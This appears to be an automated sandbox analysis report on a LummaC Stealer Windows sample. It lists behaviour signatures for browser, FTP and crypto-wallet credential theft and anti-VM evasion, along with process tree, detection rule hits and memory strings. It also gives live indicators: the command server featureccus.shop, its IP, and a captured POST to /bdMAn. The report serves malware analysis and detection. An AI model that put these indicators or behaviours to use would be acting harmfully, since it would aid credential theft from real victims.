Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1634235
MD5:	3d27865e186de4d99d25418e0c0789ff
SHA1:	38ee0c392428adbac12bc5ce77a11ff9dbb90c76
SHA256:	e249bb655c70e29e6dac7e7274a94b2f1db6e60275e1a76c6f5c1de1de241f0a
Tags:	exeuser-jstrosch
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 6228 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3D27865E186DE4D99D25418E0C0789FF)

conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

file.exe (PID: 6420 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3D27865E186DE4D99D25418E0C0789FF)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1398662498.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1398933075.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1398662498.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1398740502.0000000000EB9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1499423252.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000002.00000003.1429009276.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1270512727.0000000000B59000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 6420	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.file.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.file.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T21:03:00.709674+0100	2028371	3	Unknown Traffic	192.168.2.6	49694	172.67.204.104	443	TCP
2025-03-10T21:03:03.927763+0100	2028371	3	Unknown Traffic	192.168.2.6	49695	172.67.204.104	443	TCP
2025-03-10T21:03:07.416059+0100	2028371	3	Unknown Traffic	192.168.2.6	49696	172.67.204.104	443	TCP
2025-03-10T21:03:10.295651+0100	2028371	3	Unknown Traffic	192.168.2.6	49697	172.67.204.104	443	TCP
2025-03-10T21:03:13.708312+0100	2028371	3	Unknown Traffic	192.168.2.6	49698	172.67.204.104	443	TCP
2025-03-10T21:03:17.241459+0100	2028371	3	Unknown Traffic	192.168.2.6	49700	172.67.204.104	443	TCP
2025-03-10T21:03:21.072169+0100	2028371	3	Unknown Traffic	192.168.2.6	49702	172.67.204.104	443	TCP

HTTP traffic detected: POST /bdMAn HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: featureccus.shop

Source: file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000002.00000003.1363530038.0000000003456000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: file.exe, 00000002.00000003.1365009850.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000002.00000002.1500056161.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1453464368.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1474226267.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&4
Source: file.exe, 00000002.00000003.1425709061.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1396465507.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1399475998.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000002.00000003.1365009850.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000002.00000002.1500056161.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1425709061.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1453464368.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1396465507.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1399475998.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1474226267.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000002.00000003.1363337122.0000000000EE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/
Source: file.exe, 00000002.00000003.1362793644.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1330099309.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1332529913.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1336671821.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1363337122.0000000000EE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/4405
Source: file.exe, 00000002.00000003.1330099309.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1332529913.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/RE
Source: file.exe, 00000002.00000003.1362793644.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1363337122.0000000000EE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/Y
Source: file.exe, 00000002.00000003.1332529913.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1499111265.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1474539208.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1453123419.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1499322252.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/bdMAn
Source: file.exe, 00000002.00000003.1499111265.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/bdMAn2x
Source: file.exe, 00000002.00000003.1362793644.0000000000F07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/bdMAn=
Source: file.exe, 00000002.00000003.1498948316.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1500039877.0000000000ED2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1499243054.0000000000ED1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1453464368.0000000000ED2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/bdMAnM3
Source: file.exe, 00000002.00000003.1429009276.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/bdMAnb
Source: file.exe, 00000002.00000003.1362793644.0000000000F07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/bdMAnm
Source: file.exe, 00000002.00000003.1396383652.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1395856585.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/ics_
Source: file.exe, 00000002.00000003.1330099309.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1332529913.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1336671821.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/zE
Source: file.exe, 00000002.00000003.1453464368.0000000000ED2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1428845550.0000000000ED2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop:443/bdMAn
Source: file.exe, 00000002.00000003.1498948316.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1500039877.0000000000ED2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1499243054.0000000000ED1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop:443/bdMAn94
Source: file.exe, 00000002.00000003.1330099309.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1332529913.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop:443/bdMAnd_user_idWA
Source: file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: file.exe, 00000002.00000003.1425709061.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1396465507.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1399475998.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1365009850.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000002.00000003.1364722016.0000000003658000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000002.00000003.1364722016.0000000003658000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000002.00000002.1500056161.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1425709061.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1453464368.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1396465507.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1399475998.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1474226267.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: file.exe, 00000002.00000003.1302139284.0000000003457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: file.exe, 00000002.00000003.1364601139.0000000003452000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000002.00000003.1364601139.0000000003452000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000002.00000003.1364722016.0000000003658000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: file.exe, 00000002.00000003.1364722016.0000000003658000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000002.00000003.1364722016.0000000003658000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000002.00000003.1425709061.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1396465507.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1399475998.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: file.exe, 00000002.00000002.1500056161.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1453464368.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1474226267.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPOm

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown	HTTPS traffic detected: 172.67.204.104:443 -> 192.168.2.6:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.204.104:443 -> 192.168.2.6:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.204.104:443 -> 192.168.2.6:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.204.104:443 -> 192.168.2.6:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.204.104:443 -> 192.168.2.6:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.204.104:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.204.104:443 -> 192.168.2.6:49702 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_0043EF10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_0043EF10

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_0043EF10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_0043EF10

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_0043F0B0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

2_2_0043F0B0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A91410	0_2_00A91410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A72D00	0_2_00A72D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A56D70	0_2_00A56D70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A91E40	0_2_00A91E40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC009A	0_2_00AC009A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A96890	0_2_00A96890
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB1090	0_2_00AB1090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A868E0	0_2_00A868E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA60E7	0_2_00AA60E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A7B0F0	0_2_00A7B0F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A800F0	0_2_00A800F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A660C0	0_2_00A660C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9F8C0	0_2_00A9F8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AAA0C0	0_2_00AAA0C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A78820	0_2_00A78820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5E02C	0_2_00A5E02C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A94830	0_2_00A94830
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA2830	0_2_00AA2830
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A51000	0_2_00A51000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AAB800	0_2_00AAB800
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC6000	0_2_00AC6000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5B810	0_2_00A5B810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A61810	0_2_00A61810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A7D810	0_2_00A7D810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AAF870	0_2_00AAF870
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AAC870	0_2_00AAC870
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A66840	0_2_00A66840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5A050	0_2_00A5A050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A7A050	0_2_00A7A050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A701A0	0_2_00A701A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A8E1B0	0_2_00A8E1B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A65980	0_2_00A65980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA7980	0_2_00AA7980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A949E0	0_2_00A949E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A639F0	0_2_00A639F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A7A9D0	0_2_00A7A9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A78120	0_2_00A78120
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9D920	0_2_00A9D920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5D930	0_2_00A5D930
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A7C930	0_2_00A7C930
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A8A930	0_2_00A8A930
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A74100	0_2_00A74100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB5910	0_2_00AB5910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A59960	0_2_00A59960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A83160	0_2_00A83160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA3160	0_2_00AA3160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A7D970	0_2_00A7D970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AAC170	0_2_00AAC170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A92AA0	0_2_00A92AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A622B0	0_2_00A622B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA62B3	0_2_00AA62B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA4AB0	0_2_00AA4AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AAA2B0	0_2_00AAA2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB02B0	0_2_00AB02B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A8BA80	0_2_00A8BA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA2A80	0_2_00AA2A80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A7BA90	0_2_00A7BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A89290	0_2_00A89290
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A6F2E0	0_2_00A6F2E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A862C0	0_2_00A862C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5AAD6	0_2_00A5AAD6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A832D0	0_2_00A832D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9BAD0	0_2_00A9BAD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AABA20	0_2_00AABA20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AACA30	0_2_00AACA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB6230	0_2_00AB6230
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5B200	0_2_00A5B200
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A61A00	0_2_00A61A00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A83A00	0_2_00A83A00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A8D200	0_2_00A8D200
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A8B200	0_2_00A8B200
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A76260	0_2_00A76260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A81A70	0_2_00A81A70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A8EA70	0_2_00A8EA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA6A70	0_2_00AA6A70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AAF270	0_2_00AAF270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9EA40	0_2_00A9EA40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A553B0	0_2_00A553B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A643B0	0_2_00A643B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A753B0	0_2_00A753B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A82BB0	0_2_00A82BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A62B90	0_2_00A62B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A68BF0	0_2_00A68BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A90BD0	0_2_00A90BD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A65B20	0_2_00A65B20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A6FB20	0_2_00A6FB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A87B20	0_2_00A87B20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A74B60	0_2_00A74B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A7A360	0_2_00A7A360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA7360	0_2_00AA7360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AD3362	0_2_00AD3362
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A63370	0_2_00A63370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AADCB0	0_2_00AADCB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A86C80	0_2_00A86C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5A490	0_2_00A5A490
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AAE490	0_2_00AAE490
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB7C90	0_2_00AB7C90
